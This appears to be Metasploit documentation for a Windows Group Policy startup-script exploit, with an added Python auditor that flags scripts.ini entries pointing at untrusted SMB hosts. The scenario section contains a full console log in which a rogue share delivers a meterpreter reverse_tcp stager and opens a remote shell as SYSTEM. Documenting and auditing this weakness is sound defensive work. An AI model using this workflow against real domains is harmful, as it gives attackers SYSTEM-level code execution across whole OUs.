## Vulnerable Application
This is a general-purpose module for exploiting systems whose Windows Group Policy is configured to load VBS startup or logon scripts from remote locations.
The module hosts an SMB share that serves the payload as a VBS file. Startup scripts run with SYSTEM privileges, while logon scripts run with the
privileges of the logging-on user. The attacker still needs to redirect the target's traffic to the fake SMB share for the exploit to succeed.
Note that in some cases it can take 5 to 10 minutes to receive a session.
More information is available from [Gotham Digital Science Security](https://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html).
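The condition this module relies on (a GPO whose `scripts.ini` points a startup or logon script at a UNC path on a host other than the domain's own SYSVOL servers) is easy to audit from the defender's side. The following is an added example, not code from the Metasploit module or from the blog post above. It assumes the standard `scripts.ini` layout (`[Startup]`/`[Shutdown]` under the machine policy, `[Logon]`/`[Logoff]` under the user policy, keys `NCmdLine` and `NParameters`), and the caller supplies the list of trusted script hosts; the sample file contents are constructed for the demonstration.

```python
"""Audit a Group Policy scripts.ini for startup/logon scripts that are
loaded from remote hosts other than the domain's own SYSVOL servers.

Added example for this module doc; it is not part of Metasploit. It
assumes the standard scripts.ini layout ([Startup]/[Shutdown] for machine
policy, [Logon]/[Logoff] for user policy, keys NCmdLine and NParameters)
and that the caller supplies the trusted script hosts. The sample file
below is constructed for the demonstration.
"""
import configparser
import re

# Machine-side sections run as SYSTEM; user-side sections run as the user.
MACHINE_SECTIONS = {"startup", "shutdown"}
UNC_HOST_RE = re.compile(r"^\\\\([^\\]+)\\")
CMDLINE_KEY_RE = re.compile(r"^(\d+)CmdLine$")


def decode_scripts_ini(raw: bytes) -> str:
    """Windows writes scripts.ini as UTF-16 LE with a BOM; fall back to UTF-8."""
    if raw.startswith(b"\xff\xfe"):
        return raw.decode("utf-16")
    return raw.decode("utf-8-sig")


def parse_scripts_ini(text: str):
    """Return (section, index, cmdline, parameters) for every script entry."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str  # keep "0CmdLine" as written instead of lowercasing it
    cp.read_string(text)
    entries = []
    for section in cp.sections():
        for key, value in cp.items(section):
            m = CMDLINE_KEY_RE.match(key)
            if m:
                params = cp.get(section, f"{m.group(1)}Parameters", fallback="")
                entries.append((section, int(m.group(1)), value.strip(), params.strip()))
    return entries


def audit_scripts(entries, trusted_hosts):
    """Flag entries whose command line is a UNC path on an untrusted host.

    trusted_hosts: host names (e.g. the DCs serving SYSVOL), any case.
    Returns a list of finding dicts; an empty list means nothing suspicious.
    """
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for section, idx, cmdline, params in entries:
        m = UNC_HOST_RE.match(cmdline)
        if not m:
            continue  # local path or bare file name inside the GPO's Scripts folder
        host = m.group(1).lower()
        if host in trusted:
            continue
        findings.append({
            "section": section,
            "index": idx,
            "host": host,
            "cmdline": cmdline,
            "parameters": params,
            # A machine startup script fetched from an untrusted host executes as SYSTEM.
            "runs_as": "SYSTEM" if section.lower() in MACHINE_SECTIONS else "user",
        })
    return findings


# Constructed sample: one script served from SYSVOL on the DC, one from a
# foreign SMB share of the kind this module stands up.
SAMPLE_SCRIPTS_INI = (
    "[Startup]\n"
    "0CmdLine=\\\\dc01.msf.local\\SYSVOL\\msf.local\\scripts\\inventory.vbs\n"
    "0Parameters=\n"
    "1CmdLine=\\\\192.168.1.3\\scripts\\startup.vbs\n"
    "1Parameters=\n"
)


def demo():
    """Run the audit over the constructed sample; returns the findings list."""
    entries = parse_scripts_ini(SAMPLE_SCRIPTS_INI)
    return audit_scripts(entries, trusted_hosts={"dc01.msf.local"})


if __name__ == "__main__":
    for f in demo():
        print(f"[{f['runs_as']}] {f['section']} #{f['index']}: {f['cmdline']} (host {f['host']})")
```

In a real deployment you would read each GPO's `Machine\Scripts\scripts.ini` and `User\Scripts\scripts.ini` from SYSVOL, pass the bytes through `decode_scripts_ini`, and treat any `SYSTEM` finding as the highest priority, since that is exactly the path that hands a foreign share code execution as `NT AUTHORITY\SYSTEM` on every computer in the linked OU.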
## Verification Steps
1. Start msfconsole
2. Do: `use modules/exploits/windows/smb/group_policy_startup`
3. Do: `exploit`
## Options
**FILE_NAME**
VBS File name to share (Default: random .vbs)
**FOLDER_NAME**
Folder name to share (Default: none)
**SHARE**
Share name (Default: Random)
## Scenarios
### Domain Group Policy
In this scenario, the following computers are present:
1. Windows 7 (x64, Build 7601, SP1): Victim
2. Server 2016 (x64, Version 1607, OS Build 14393.970): Domain Controller
The module sets up the SMB share and the VBScript file. Out of band (outside the scope of this module and these docs), a Group Policy that references the share is applied to the computer `OU`.
On the next boot the Win 7 box fetches the payload, in this case the meterpreter reverse_tcp stager, and runs it with `SYSTEM` privileges because it executes as a startup script.
Any other computer in that `OU` would also execute the script at startup.
```
msf > use modules/exploits/windows/smb/group_policy_startup
msf exploit(windows/smb/group_policy_startup) > set FILE_NAME startup.vbs
FILE_NAME => startup.vbs
msf exploit(windows/smb/group_policy_startup) > set SHARE scripts
SHARE => scripts
msf exploit(windows/smb/group_policy_startup) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.3:4444
[*] File available on \\192.168.1.3\scripts\startup.vbs...
[*] Started service listener on 192.168.1.3:445
[*] Server started.
[*] Sending stage (180291 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.4:49178) at 2019-12-04 13:12:05 -0700
msf exploit(windows/smb/group_policy_startup) > sessions 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : MSF-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : MSF
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```